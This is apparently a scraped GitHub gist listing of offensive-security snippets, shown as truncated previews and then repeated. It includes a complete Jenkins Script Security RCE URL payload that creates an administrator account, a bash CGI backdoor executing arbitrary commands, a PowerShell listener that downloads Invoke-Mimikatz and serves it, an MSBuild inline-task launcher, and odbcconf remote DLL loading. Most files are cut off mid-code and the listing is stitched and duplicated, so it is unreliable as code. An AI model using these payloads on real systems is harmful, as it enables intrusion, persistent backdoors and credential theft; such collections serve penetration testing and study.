Chris Gates carnal0wnage

## ManualPayloadGenerate.java
/*
    DiabloHorn - https://diablohorn.com
    For learning purposes we build the groovy payload ourselves instead of using
    ysoserial. This helps us better understand the chain and the mechanisms
    involved in exploiting this bug.

    compile with:
        javac -cp <path to groovy lib> ManualPayloadGenerate.java
    Example:
        javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java

## deserlab_exploit.py
#!/usr/bin/env python
"""
    DiabloHorn - https://diablohorn.com
    References
        https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
        https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
        https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
        http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
        https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
        https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478

## CVE-2019-1003000-Jenkins-RCE-POC.py
#!/usr/bin/python

# Author: Adam Jordan
# Date: 2019-02-15
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


import argparse
import jenkins

## payload
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}

## server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)

## msbuild.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## blackhat_arsenal.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                godinezj
                / blackhat_arsenal.md
            
            
              Created
              July 27, 2017 18:34
            
          
    Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:

Blackhat Arsenal 2017 presentation: https://www.blackhat.com/us-17/arsenal.html#cumulus-a-cloud-exploitation-toolkit
Cumulus - A Cloud Exploitation Toolkit: https://drive.google.com/file/d/0B2Ka7F_6TetSNFdfbkI1cnJHUTQ
The code, see cumulus branch: https://github.com/godinezj/metasploit-framework
xxe-example, see https://github.com/rgerganov/xxe-example


## gist:38dcff6a0975f148aa858e924d64c492
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi


## netgear_upnp_csrf.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetGear UPnP CSRF',

## odbcconf.cs
/*
To use with odbcconf.exe:

odbcconf /S /A {REGSVR odbcconf.dll}

or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/

using System;
	/*
	DiabloHorn - https://diablohorn.com
	For learning purposes we build the groovy payload ourselves instead of using
	ysoserial. This helps us better understand the chain and the mechanisms
	involved in exploiting this bug.

	compile with:
	javac -cp <path to groovy lib> ManualPayloadGenerate.java
	Example:
	javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
	#!/usr/bin/env python
	"""
	DiabloHorn - https://diablohorn.com
	References
	https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
	https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
	https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
	http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
	https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
	https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
	#!/usr/bin/python

	# Author: Adam Jordan
	# Date: 2019-02-15
	# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
	# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


	import argparse
	import jenkins
	$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
	$Hso = New-Object Net.HttpListener
	$Hso.Prefixes.Add("http://+:8080/")
	$Hso.Start()
	While ($Hso.IsListening) {
	$HC = $Hso.GetContext()
	$HRes = $HC.Response
	$HRes.Headers.Add("Content-Type","text/plain")
	If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
	$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"
	cd /tmp
	mkdir cgi-bin
	echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
	echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
	echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
	chmod +x ./cgi-bin/backdoor.cgi
	python -m http.server --cgi
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'NetGear UPnP CSRF',
	/*
	To use with odbcconf.exe:

	odbcconf /S /A {REGSVR odbcconf.dll}

	or, from a remote location (if WebDAV support enabled):
	odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
	*/

	using System;